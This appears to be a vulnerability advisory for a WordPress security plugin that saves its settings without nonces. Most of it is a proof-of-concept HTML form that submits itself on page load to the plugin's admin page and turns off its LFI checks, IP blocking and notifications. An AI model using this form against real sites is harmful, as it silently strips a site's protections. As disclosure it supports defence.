The plugin does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin’s protections.
<form id="test" action="https://example.com/wp-admin/admin.php?page=lbsa_home" method="post">
<input type="text" name="savelbsa" value="1">
<input type="text" name="onlyfront" value="0">
<input type="text" name="checkwp" value="0">
<input type="text" name="namespaces" value="GET">
<input type="text" name="levelLFI" value="50">
<input type="text" name="sendnotification" value="0">
<input type="text" name="sendto" value="">
<input type="text" name="raiseerror" value="0">
<input type="text" name="redirurl" value="https://google.com">
<input type="text" name="errorcode" value="">
<input type="text" name="errormsg" value="">
<input type="text" name="ipblock" value="0">
<input type="text" name="ipblocktime" value="222">
<input type="text" name="ipblockcount" value="666666666">
</form>
<script>
document.getElementById("test").submit();
</script>